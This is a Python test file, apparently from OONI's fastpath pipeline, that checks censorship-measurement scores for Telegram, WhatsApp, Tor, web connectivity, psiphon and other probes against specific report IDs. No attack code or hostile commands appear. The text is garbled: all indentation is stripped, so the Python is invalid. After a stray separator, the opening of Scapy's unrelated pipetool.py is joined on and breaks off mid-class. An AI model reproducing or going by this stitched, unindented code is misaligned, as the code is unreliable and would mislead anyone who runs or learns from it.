print("https://explorer.ooni.org/measurement/{}".format(msm["report_id"]))
_print_msm_node(msm)
print("--------")
def load_can(can):
cnt = 0
for msm_jstr, msm, _ in s3feeder.load_multiple(can.as_posix()):
msm = msm or ujson.loads(msm_jstr)
if msm.get("report_id", None) is None:
# Missing or empty report_id
# https://github.com/ooni/probe-engine/pull/104
continue
yield cnt, msm
cnt += 1
# TODO mock out metrics
def setup_module(module):
fp.conf.devel = True
fp.conf.update = False
fp.conf.interact = False
fp.setup_dirs(fp.conf, Path(os.getcwd()))
fp.setup_fingerprints()
def test_telegram(cans):
can = cans["telegram"]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid == "20190830T002837Z_AS209_3nMvNkLIqSZMLqRiaiQylAuHxu6qpK7rVJcAA9Dv2UpcNMhPH0":
assert scores == {
"blocking_general": 1.5,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": None,
"accessible_endpoints": 10,
"unreachable_endpoints": 0,
"http_success_cnt": 0,
"http_failure_cnt": 0,
}, msm
elif rid == "20190829T205910Z_AS45184_0TVMQZLWjkfOdqA5b5nNF1XHrafTD4H01GnVTwvfzfiLyLc45r":
assert scores == {
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": "connection_reset",
"accessible_endpoints": 10,
"unreachable_endpoints": 0,
"http_success_cnt": 10,
"http_failure_cnt": 0,
"msg": "Telegam failure: connection_reset",
}
elif rid == "20190829T210302Z_AS197207_28cN0a47WSIxF3SZlXvceoLCSk3rSkyeg0n07pKGAi7XYyEQXM":
assert scores == {
"blocking_general": 3.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": "generic_timeout_error",
"accessible_endpoints": 0,
"unreachable_endpoints": 10,
"http_success_cnt": 0,
"http_failure_cnt": 10,
"msg": "Telegam failure: generic_timeout_error",
}
elif rid == "20190829T220118Z_AS16345_28eP4Hw7PQsLmb4eEPWitNvIZH8utHddaTbWZ9qFcaZudmHPfz":
assert scores == {
"blocking_general": 3.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": "connect_error",
"accessible_endpoints": 0,
"unreachable_endpoints": 10,
"http_success_cnt": 0,
"http_failure_cnt": 10,
"msg": "Telegam failure: connect_error",
}
def test_whatsapp(cans):
can = cans["whatsapp"]
debug = False
for msm_n, msm in load_can(can):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20190830T002828Z_AS209_fDHPMTveZ66kGmktmW8JiGDgqAJRivgmBkZjAVRmFbH92OIlTX":
# empty test_keys -> requests
log.error(scores)
assert scores == {
"accuracy": 0.0,
"blocking_country": 0.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
elif rid == "20190829T002541Z_AS29119_kyaEYabRxQW6q41n4kPH9aX5cvFEXNheCj1fguSf4js3JydUbr":
# The probe is reporting a false positive: due to the empty client headers
# it hits https://www.whatsapp.com/unsupportedbrowser
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"analysis": {
"registration_server_accessible": True,
"whatsapp_endpoints_accessible": True,
"whatsapp_web_accessible": True,
},
}, msm
# TODO: investigate
# rid == "20190829T021242Z_AS7575_4Us58f7iaQ6jshRAoGVCXggTqtuV5wLNlkp33GJJS4H8Wg7ssV":
# rid == "20190829T022402Z_AS9009_5zr5RWPkzRPEG0bhEFoWEEi6QB0arZ4qTO72b5iaKwdo6gzLEw":
# To inspect the test dataset for false positives run this:
if debug and scores["blocking_general"] > 0:
print_msm(msm)
print(scores)
raise Exception("debug")
def test_whatsapp_probe_bug(cans):
# https://github.com/ooni/probe-engine/issues/341
debug = False
for can_fn, msm in s3msmts("whatsapp", date(2020, 1, 1), date(2020, 1, 10)):
scores = fp.score_measurement(msm)
assert scores["blocking_general"] in (0.0, 1.0)
if "analysis" in scores:
assert scores["analysis"]["whatsapp_web_accessible"] in (
True,
False,
), ujson.dumps(msm, indent=1, sort_keys=True)
if debug and scores["blocking_general"] > 0:
print_msm(msm)
print(scores)
raise Exception("debug")
def test_facebook_messenger(cans):
can = cans["facebook_messenger"]
debug = False
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
if msm["report_id"] != "20190829T105137Z_AS6871_TJfyRlEkm6BaCfszHr06nC0c9UsWjWt8mCxRBw1jr0TeqcHTiC":
continue
if msm["report_id"] == "20190829T105137Z_AS6871_TJfyRlEkm6BaCfszHr06nC0c9UsWjWt8mCxRBw1jr0TeqcHTiC":
# not blocked
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}, msm
# TODO: add more
# To inspect the test dataset for false positives run this:
elif debug and scores["blocking_general"] > 0:
print_msm(msm)
print(scores)
if debug:
raise Exception("debug")
@pytest.mark.skip(reason="Client bug in checking Facebook ASN")
def test_facebook_messenger_bug(cans):
can = cans["facebook_messenger"]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
if msm["report_id"] != "20190829T000015Z_AS137_6FCvPkYvOAPUqKgO8QdllyWXTPXUbUAVV3cA43E6drE0KAe4iO":
continue
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
def test_facebook_messenger_newer(cans):
can = cans["facebook_messenger2"] # from 2019-10-29
blocked_cnt = 0
debug = False
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid == "20191029T101630Z_AS56040_bBOkNtg65fMfH0iOHiG8lMk4UmERxjfJL20ki33lKlyKjS0FkP":
# TCP really blocked
assert scores["blocking_general"] >= 1.0
continue
elif rid == "20191029T020948Z_AS50010_ZUPoP3hOdwazqZnzPurdWgfLvoMcDL1qyOHHFtEtISjNWMgkrX":
# DNS returns mostly 0.0.0.0 - but one connection succeeds
assert scores["blocking_general"] >= 1.0
continue
elif scores["blocking_general"] > 0:
blocked_cnt += 1
if debug:
print_msm(msm)
print(scores)
ratio = blocked_cnt / (msm_n + 1) * 100
assert ratio > 7.656
assert ratio < 7.657
# TODO: investigate false positives, implement workarounds
# and update tests and ratio
# https://explorer.ooni.org/measurement/20191029T213318Z_AS1257_DA3tEqiSVtfOllWDIXcw6KVJdit0TX9Tiv8y2Xganhlx2iWzzh
# https://explorer.ooni.org/measurement/20191029T213035Z_AS1257_v8XgIqXZqfZObmToEdeAkjs8R3F6ZPwMIieQJ0ewWdgyG75NiP
# empty tcp_connect:
# https://explorer.ooni.org/measurement/20191029T003015Z_AS0_DRQLG75YbuAA24UBvGilpatyq9kPUpbcVLR28JBN8EBfv8CzcT
# https://explorer.ooni.org/measurement/20191029T153938Z_AS33771_l0QJDcqNE5h0ePNxIbTKXY0Gr4LTJwl2Vg4gvPBeCvhcEisKzT
# Everything around DNS looks broken but TCP is OK
# https://explorer.ooni.org/measurement/20191029T213318Z_AS1257_DA3tEqiSVtfOllWDIXcw6KVJdit0TX9Tiv8y2Xganhlx2iWzzh
def test_score_measurement_hhfm_large(cans):
debug = False
for d in range(26, 30):
can = cans["hhfm_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20191028T115649Z_AS28573_eIrzDM4njwMjxBi0ODrerI5N03zM7qQoCvl4xpapTccdW0kCRg":
# Missing the "requests" field
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T103751Z_AS0_A7vlqt3Ju8pmWflPxJ3E9NyrWJX47yYzQFJcSw63RBDtDm5ulf":
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T143046Z_AS35540_5j5W6Q9Iz2pvVNaBtn2heKVHRDzuPtKNcLfrIhVHTmrgA7kWaT":
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T192636Z_AS55430_DXpEUz925f3BS7UWyMPnXL8g8OtyDIF3FArF2z9h1ILMtrc":
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T002012Z_AS45595_p2qNg0FmL4d2kIuLQXEn36MbraErPPA5i64eE1e6nLfGluHpLk":
# Client bug?
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T192636Z_AS55430_DXpEUz925f3BS7UWyMPnXL8g8OtyDIF3FArF2z9h1ILMtrcbyb":
# Success - response code 200
assert scores["blocking_general"] == 0, scores
elif rid == "20191029T231841Z_AS1257_sGsZRCxZ8obOSLCVCLppeUSfu1La481EQ6E6MGkGBTgffJBs6t":
# x-tele2-subid was injected
assert scores["blocking_general"] > 0, scores
assert scores["msg"] == "1 unexpected header change"
elif rid == "20191029T071035Z_AS45629_wwVlbw7hc1jJaP5tBfzICM8S4dBhPJK29V97YzJLpthft1Zo6z":
# Proxy injecting 3 headers
assert scores["blocking_general"] > 0, scores
elif debug and scores["blocking_general"] == 1.1:
url = "https://explorer.ooni.org/measurement/{}".format(rid)
print(
msm["test_start_time"],
msm["probe_cc"],
url,
msm["test_keys"]["requests"][0].get("failure", None),
)
print_msm(msm)
print(scores)
def disabled_test_score_measurement_hhfm_stats(cans):
can = cans["hhfm_2019_10_27"]
# Distribution of request->failure values in this can
#
# connection_refused 599
# connection_refused_error 144
# connection_reset 67
# None 29
# eof_error 18
# generic_timeout_error 4
# response_never_received 4
# network_unreachable 2
# connect_error 1
# Total 868
d = Counter() # CC:failure type -> count
s = Counter() # failure type -> count
for n, msm in enumerate(load_can(can)):
rid = msm["report_id"]
# scores = fp.score_measurement(msm)
cc = msm["probe_cc"]
fm = msm["test_keys"]["requests"][0].get("failure", "*************")
if fm is None:
print_msm(msm)
url = "https://explorer.ooni.org/measurement/{}".format(rid)
print(url)
print(msm["probe_cc"], msm["test_keys"]["requests"][0].get("failure", None))
d.update(("{}:{}".format(cc, fm),))
s.update((fm,))
# for i, c in d.most_common(120):
# print(i, c)
for i, c in s.most_common(120):
print(i, c)
print("Total", sum(s.values()))
assert 0
## test_name: vanilla_tor
def test_score_vanilla_tor_2018(cans):
can = cans["tor_2018_10_26"]
timeouts = (
"20181026T003600Z_AS4134_SIts9rD3mrpgIrxrBy6NY7LHJGsBm2dbV4Q8rOHnFEQVESMqB1",
"20181026T154843Z_AS57963_GKCdB85BgIqr5frZ2Z8qOXVZgdpNGajLRXSidMeRVWg8Qvto3e",
)
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid in timeouts:
# Real timeout
assert scores["blocking_general"] > 0
def test_score_vanilla_tor(cans):
cnt = 0
blocked_cnt = 0
total_score = 0
for d in range(26, 30):
can = cans["tor_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
cnt += 1
if rid == "20191029T012425Z_AS45194_So00Y296Ve6q1TvjOtKqsvH1ieiVF566PlcUUOw4Ia37HGPwPL":
# timeout
assert scores["blocking_general"] > 0
blocked_cnt += 1
total_score += scores["blocking_general"]
elif scores["blocking_general"] > 0:
blocked_cnt += 1
total_score += scores["blocking_general"]
# print("https://explorer.ooni.org/measurement/{}".format(rid))
# print_msm(msm)
# print(scores)
# assert 0
p = blocked_cnt * 100 / cnt
assert 0.35 < p < 0.36, p
avg = total_score / cnt
assert 0.003 < avg < 0.004
## test_name: tor
# Also see test_score_tor() in test_unit.py
def test_score_tor():
for can_fn, msm in s3msmts("tor", date(2020, 6, 1), date(2020, 6, 12)):
assert msm["test_name"] == "tor"
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20200601T000014Z_AS8339_RC9uUMBtq5AkMLx6xDtTxEciPvd171jQaYx1i3dDbhH27PemEx":
assert scores == {
"blocking_general": 0.05714285714285714,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 31.942783471},
}
# TODO: review tests
break
# # test_name: http_requests
def test_score_http_requests():
cnt = 0
for can_fn, msm in s3msmts("http_requests", date(2016, 12, 29), date(2016, 12, 29)):
assert msm["test_name"] == "http_requests"
erid = "20161225T225955Z_AS200938_ffNnCYb1F8ih0MnomQro2ktalI7d8KnHGwQUXs0ZaqbQHTxBG1"
erid = "20161225T025526Z_AS200938_FAmaY6pHD0AoFH5DO9I9ppLP1TGnVMkrXszEUc0N7msaGcEUgt"
skip = [
"XA4JPdyzcoVgo0tWp6xzcBmxxwBGW92uR8rYdxk4843IMeA3iPgBJZ0Y5cqoIMvN",
"CkXZQnaB77inMBE161Mnh0VDPAJYRioSRzXVX8QMNdiFyfCdMMDod9X5MGmsbd20",
"CkXZQnaB77inMBE161Mnh0VDPAJYRioSRzXVX8QMNdiFyfCdMMDod9X5MGmsbd20",
]
rid = msm["report_id"]
if rid in skip:
continue
# if rid != erid:
# continue
cnt += 1
if cnt > 3000:
break
print(rid)
scores = fp.score_measurement(msm)
if rid == "20200601T000014Z_AS8339_RC9uUMBtq5AkMLx6xDtTxEciPvd171jQaYx1i3dDbhH27PemEx":
assert scores == {
"blocking_general": 0.05714285714285714,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
## test_name: web_connectivity
def test_score_web_connectivity_simple(cans):
# (rid, inp) -> scores: exact match on scores
expected = {
(
"20191104T000516Z_AS52871_uFya6RnctQPrBVEdxE9uUpOxia9frBkNXkP9ZNmhQPEFoKqJ0l",
"https://100ko.wordpress.com/",
): {
# unknown_failure
"scores": {
"accuracy": 0.0,
"analysis": {"blocking_type": "http-failure"},
"blocking_country": 0.0,
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191104T032906Z_AS8402_fY9b9V3jLtosTMNJbub1xNvuKBpZwPXTp7df9NLw6Sp4QOnXIz",
"http://www.ohchr.org/",
): {
"scores": {
"blocking_country": 0.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191101T015523Z_AS0_muvGSfWmgRobU77ZL980XGRTyJ80HC0ubQ5YaPaYiotxiXL6po",
"http://www.newnownext.com/franchise/the-backlot/",
): {
"scores": {
"analysis": {"blocking_type": "http-diff"},
"blocking_country": 0.0,
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191101T071829Z_AS0_sq5lk0Y4jhCECrgk2pAgMWlgOczBLDkIb2OE9QnHf1OEOmwOBz",
"http://www.lingeriebowl.com",
): {
"scores": {
"analysis": {"blocking_type": "dns"},
"blocking_country": 0.0,
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191101T071829Z_AS0_sq5lk0Y4jhCECrgk2pAgMWlgOczBLDkIb2OE9QnHf1OEOmwOBz",
"http://www.pravda.ru",
): {
# In this msmt title_match is false due to the probe following a redirect.
# The probe uses:
# (body_length_match or headers_match or title_match) and (status_code_match != false)
"scores": {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
}
for can_fn, msm in s3msmts("web_connectivity", start_date=date(2019, 11, 1)):
rid = msm["report_id"]
inp = msm["input"]
scores = fp.score_measurement(msm)
if (rid, inp) not in expected:
# log.warning(f"https://explorer.ooni.org/measurement/{rid}?input={inp}")
# log.warning((rid, inp, scores))
continue
exp = expected.pop((rid, inp))
if "scores" in exp:
assert scores == exp["scores"]
assert len(expected) == 0, "Not all expected measurements were tested"
@pytest.mark.skip(reason="FIXME")
def test_score_web_connectivity_with_workers(cans, tmp_path):
# Run worker processes on a big can
# Mock out database interactions but write output json
# files
can = cans["big2858"]
expected_cnt = 2858
outdir = tmp_path
assert tuple(tmp_path.glob("*")) == ()
import fastpath.portable_queue as queue
import multiprocessing as mp
fp.db.setup = MagicMock()
fp.db.trim_old_measurements = MagicMock()
fp.db._autocommit_conn = MagicMock()
m1 = MagicMock(name="mycursor")
mctx = MagicMock(name="mock_ctx")
# By mocking SQL execute(), each worker logs its queries to a dedicated
# file. We then collect the files to check whether all inputs were processed.
def mock_execute(query, *a, **kw):
try:
pid = os.getpid()
wl = outdir / f"{pid}.wlog"
if wl.is_file():
log.debug("Loading %s", wl)
d = ujson.load(wl.open())
else:
d = dict(inserted_tids=[], other_queries=[])
if "INSERT INTO fastpath" in query:
query_args = a[0]
assert len(query_args) == 11
tid = query_args[0]
d["inserted_tids"].append(tid)
elif "SELECT pg_notify('fastpath" in query:
pass
else:
d["other_queries"].append(query)
ujson.dump(d, wl.open("w"))
except Exception as e:
log.exception(e)
mctx.execute = mock_execute
m1.__enter__ = MagicMock(name="myenter", return_value=mctx)
fp.db._autocommit_conn.cursor = MagicMock(name="curgen", return_value=m1)
workers = [mp.Process(target=fp.msm_processor, args=(queue,)) for n in range(4)]
[t.start() for t in workers]
for w in workers:
wl = outdir / f"{w.pid}.wlog"
if wl.is_file():
wl.unlink()
assert w.is_alive()
for msm_n, msm in load_can(can):
queue.put((None, msm))
assert msm_n == expected_cnt - 1
for w in workers:
# each worker will receive one terminator message and quit
queue.put(None)
while any(w.is_alive() for w in workers):
log.debug("waiting...")
time.sleep(0.1)
assert len(tuple(tmp_path.glob("*"))) == expected_cnt, tmp_path
all_inserted_tids = set()
for w in workers:
wl = outdir / f"{w.pid}.wlog"
assert wl.is_file(), "The worker did not create a logfile"
d = ujson.load(wl.open())
wl.unlink()
s = set(d["inserted_tids"])
assert len(s) == len(d["inserted_tids"]), "Duplicate INSERT INTO"
dup = all_inserted_tids & s
assert len(dup) == 0, f"{dup} inserted by different workers"
all_inserted_tids = all_inserted_tids | s
assert len(all_inserted_tids) == expected_cnt
def test_score_ndt(cans):
can = cans["ndt_2018_10_26"]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
assert scores == {} # no scoring yet
def test_score_tcp_connect(cans):
# tcp_connect msmts are identified by (report_id / input)
debug = 0
can = cans["tcp_connect_2018_10_26"]
for msm_n, msm in load_can(can):
rid = msm["report_id"]
inp = msm["input"]
scores = fp.score_measurement(msm)
if rid == "20181026T000102Z_AS51570_2EslrKCu0NhDQiCIheVDvilWchWShK6GTC7Go6i31VQrGfXRLM":
if inp == "109.105.109.165:22":
# generic_timeout_error
assert scores["blocking_general"] == 0.8
elif inp == "obfs4 83.212.101.3:50000":
# connection_refused_error
assert scores["blocking_general"] == 0.8
elif inp == "178.209.52.110:22":
# connect_error
assert scores["blocking_general"] == 0.8
elif inp == "obfs4 178.209.52.110:443":
# tcp_timed_out_error
assert scores["blocking_general"] == 0.8
elif debug and scores["blocking_general"] > 0.7:
print("https://explorer.ooni.org/measurement/{}".format(rid))
print_msm(msm)
print(scores)
assert 0
def test_score_dash(cans):
# rid -> blocking_general, accuracy
expected = {
"20191026T015105Z_AS4837_7vwBtbVmZZqwZhdTHnqHan0Nwa7bi7TeJ789htG3RB91C3eyU1": (
0.1,
0.0,
"blocking_general",
),
"20191026T022317Z_AS17380_ZJGnXdvHl4j1M4xTeskrGhC8SW1KT4buJEjxCsTagCGO2NZeAD": (
0.1,
0.0,
"json_parse_error",
),
"20191026T032159Z_AS20057_xLjBSrTyZjOn6C7pa5BPyUxyBhzWHbSooKQjUY9zcWADnkakIR": (
0.1,
0.0,
"eof_error",
),
"20191026T051350Z_AS44244_9yjPG1UbgIjtAFg9LiTUxVhq7hGuG3tG4yMnvt6gRJTaFdQme6": (
0.1,
0.0,
"json_processing_error",
),
"20191026T071332Z_AS7713_caK9GNyp9ZhN7zL9cg2dg0zGhs44CwHmxZtOyK7B6rBKRaGGMF": (
0.1,
0.0,
"http_request_failed",
),
"20191026T093003Z_AS4837_yHZ0f8Oxyhus9vBKAUa0tA2XMSObIO0frShG6YBieBzY9RiSBg": (
0.1,
0.0,
"connect_error",
),
"20191026T165434Z_AS0_qPbZHZF8VXUWgzlvqT9Jd7ARuHSl2Dq4tPcEq580rgYZGmV5Um": (
0.1,
0.0,
"generic_timeout_error",
),
"20191028T160112Z_AS1640_f4zyjjp5vFcwZkAKPrTokayPRdcXPfdEMRbdo1LmIaLZRile6P": (
0.1,
0.0,
"broken_pipe",
),
"20191029T094043Z_AS49048_qGQxBh6lv26TOfuWfhGcUtz2LZWwboXlfbh058CSF1fOmEUv6Z": (
0.1,
0.0,
"connection_refused",
),
}
for d in range(26, 30):
can = cans["dash_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
# input is not set or set to None
assert msm.get("input", None) is None
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid in expected:
exp_bs, exp_acc, exp_fail = expected[rid]
assert scores["blocking_general"] == exp_bs
assert scores["accuracy"] == exp_acc
expected.pop(rid)
assert len(expected) == 0, expected.keys()
def test_score_meek_fronted_requests_test(cans):
debug = 0
for d in range(26, 30):
can = cans["meek_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20191026T110224Z_AS3352_2Iqv4PvPItJ2Z3D46wVRHzesBpdDJZ8xDKH7VKqNTebaiGopDY":
# response: None
assert scores["blocking_general"] == 1.0
elif rid == "20191026T000021Z_AS137_0KaXWBZgn8W6iMfKKhjHJPoPPovChlwxr8dDOh4LxTzHDOKLOq":
# One response: 404
assert scores["blocking_general"] == 1.0
elif rid == "20191026T000034Z_AS42668_vpZnPVKEym0dRgYSxyeZulPvnLtxrh6HXzyMx5tE2f4x26CBwX":
# 403 hitting cloudfront
# Content-Type: text/html
# Date: Sat, 26 Oct 2019 01:01:21 GMT
# Server: CloudFront
# Via: 1.1 60858c13889b9be849ae025edc06577d.cloudfront.net (CloudFront)
# X-Amz-Cf-Pop: ARN53
# X-Cache: Error from cloudfront
assert scores["blocking_general"] == 1.0
elif rid == "20191026T001625Z_AS19108_G9uGTtyJCiOzeCm4jHsP6r8WRZ8cWx07wvcjwAVmrTshJ8WYwA":
# requests: is empty
assert scores["accuracy"] == 0
elif debug:
print("https://explorer.ooni.org/measurement/{}".format(rid))
print_msm(msm)
print(scores)
assert 0
def test_score_psiphon(cans):
for can_fn, msm in s3msmts("psiphon", date(2020, 1, 9), date(2020, 1, 10)):
assert msm["test_name"] == "psiphon"
rid = msm["report_id"]
# test version 0.3.1 has different mkeys than before
mkeys = set(msm.keys())
mkeys.discard("resolver_ip") # Some msmts are missing this
assert len(mkeys) in (13, 15)
assert len(msm["test_keys"]) in (3, 6, 7)
assert 1 < msm["test_keys"]["bootstrap_time"] < 500
assert msm["test_keys"]["failure"] is None, msm
scores = fp.score_measurement(msm)
if rid == "20200109T111813Z_AS30722_RZeO9Ix6ET2LJzqGcinrDp1iqrhaGGDCHSwlOoybq2N9kZITQt":
assert scores == {
"accuracy": 1.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 15.25602748, "bootstrap_time": 5.532639553},
}
break
@pytest.mark.skip("slow")
def test_score_psiphon_2():
for can_fn, msm in minicans("psiphon", date(2021, 11, 1), date(2021, 11, 2), 1):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20211101T002503Z_psiphon_AT_40980_n1_pJPrpMWu3rfDXEcV":
assert scores == {
"accuracy": 1.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 6.774142658},
}, msm
return
assert 0, "Measurement not found"
def test_score_http_invalid_request_line_1():
# https://github.com/ooni/pipeline/issues/294
# https://explorer.ooni.org/measurement/20190411T192031Z_AS12353_JcA0e4AwUYYzR8aSXkoOiPGSiSmG8naeMOYnOPisECTr5bqelw
# AdGuard
fn = "fastpath/tests/data/mbx-1.json"
with open(fn) as f:
msm = ujson.load(f)
matches = []
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
def test_score_http_invalid_request_line_2():
# https://github.com/ooni/pipeline/issues/293
# https://explorer.ooni.org/measurement/20181223T053541Z_AS37211_Vjr633mrbpd5UwOkZXid7U8QnwdDILnDu63UTFd1gE7zR4gnhN
fn = "fastpath/tests/data/mbx-2.json"
with open(fn) as f:
msm = ujson.load(f)
matches = []
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
def test_score_http_invalid_request_line():
optional = frozenset(
(
"backend_version",
"bucket_date",
"id",
"input",
"input_hashes",
"options",
"probe_city",
"report_filename",
"resolver_asn",
"resolver_ip",
"resolver_network_name",
"test_helpers",
)
)
always_present = frozenset(
(
"annotations",
"data_format_version",
"measurement_start_time",
"probe_asn",
"probe_cc",
"probe_ip",
"report_id",
"software_name",
"software_version",
"test_keys",
"test_name",
"test_runtime",
"test_start_time",
"test_version",
)
)
allkeys = optional | always_present
for can_fn, msm in s3msmts("http_invalid_request_line", date(2019, 12, 3), date(2019, 12, 5)):
assert msm["test_name"] == "http_invalid_request_line"
for k in msm:
assert k in allkeys
for k in always_present:
assert k in msm
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid == "20191203T020321Z_AS21502_wcb1ieBo7mO2vffn2FOlQW2oPw4QiaOoLiYGWoecyV5aQQaMGm":
# failure
assert scores["accuracy"] == 0.0
def test_score_signal():
for can_fn, msm in minicans("signal", date(2021, 4, 27), date(2021, 4, 27), 100):
assert msm["test_name"] == "signal"
scores = fp.score_measurement(msm)
assert scores
rid = msm["report_id"]
if rid == "20210427T023145Z_signal_CN_24400_n1_ynto2TVYXtqxhtOo":
assert scores == {
"analysis": {"signal_backend_failure": "generic_timeout_error"},
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
elif rid == "20210427T000430Z_signal_AU_45671_n1_Zq1z77FuiG2IkqqC":
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
# No failure was found
# elif "accuracy" in scores:
def test_score_stunreachability():
for can_fn, msm in minicans("stunreachability", date(2022, 1, 25), date(2022, 1, 26), 1):
scores = fp.score_measurement(msm)
assert msm["report_id"] == "20220125T000735Z_stunreachability_AT_12605_n1_DaOzvtj2vaXE8GH2"
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"endpoint": "stun.l.google.com:19302"},
}
return
assert 0, "Measurement not found"
def test_score_torsf():
for can_fn, msm in minicans("torsf", date(2021, 11, 23), date(2021, 11, 23), 1):
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"bootstrap_time": 142.883336871, "test_runtime": 143.090651217},
}
assert msm["report_id"] == "20211123T142631Z_torsf_IT_30722_n1_vrWHDorLfK5ROZzS"
return
assert 0, "Measurement not found"
def test_score_riseupvpn():
for can_fn, msm in minicans("riseupvpn", date(2021, 10, 15), date(2021, 10, 16), 1):
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 3.8260852},
}
assert msm["report_id"] == "20211015T005140Z_riseupvpn_AR_7303_n1_gc8so3BXiS9thxBJ"
return
assert 0, "Measurement not found"
def test_flag_measurements_with_wrong_date_from_future():
# measurement_start_time > msmt_uid timestamp
msm = {"measurement_start_time": "2021-11-09 23:59:31"}
msmt_uid = "20211109115946.469008_IR_webconnectivity_9ba8a0d4f9b116fe"
scores = {}
fp.flag_measurements_with_wrong_date(msm, msmt_uid, scores)
assert scores["msg"] == "Measurement start time from the future"
def test_flag_measurements_with_wrong_date_too_old():
msm = {"measurement_start_time": "2020-01-01 00:00:01"}
msmt_uid = "20211109115946.469008_IR_webconnectivity_9ba8a0d4f9b116fe"
scores = {}
fp.flag_measurements_with_wrong_date(msm, msmt_uid, scores)
assert scores["msg"] == "Measurement start time too old"
|
pipetool.py | #! /usr/bin/env python
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more information
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
from __future__ import print_function
import os
import subprocess
import itertools
import collections
import time
import scapy.modules.six as six
from threading import Lock, Thread
import scapy.utils
from scapy.automaton import Message, select_objects, SelectableObject
from scapy.consts import WINDOWS
from scapy.error import log_interactive, warning
from scapy.config import conf
from scapy.utils import get_temp_file, do_graph
import scapy.arch
class PipeEngine(SelectableObject):
pipes = {}
@classmethod
def list_pipes(cls):
for pn,pc in sorted(cls.pipes.items()):
doc = pc.__doc__ or ""
if doc:
doc = doc.splitlines()[0]
print("%20s: %s" % (pn, doc))
@classmethod
def list_pipes_detailed(cls):
for pn,pc in sorted(cls.pipes.items()):
if pc.__doc__:
print("###### %s\n %s" % (pn ,pc.__doc__))
else:
print("###### %s" % pn)
def __init__(self, *pipes):
self.active_pipes = set()
self.active_sources = set()
self.active_drains = set()
self.active_sinks = set()
self._add_pipes(*pipes)
self.thread_lock = Lock()
self.command_lock = Lock()
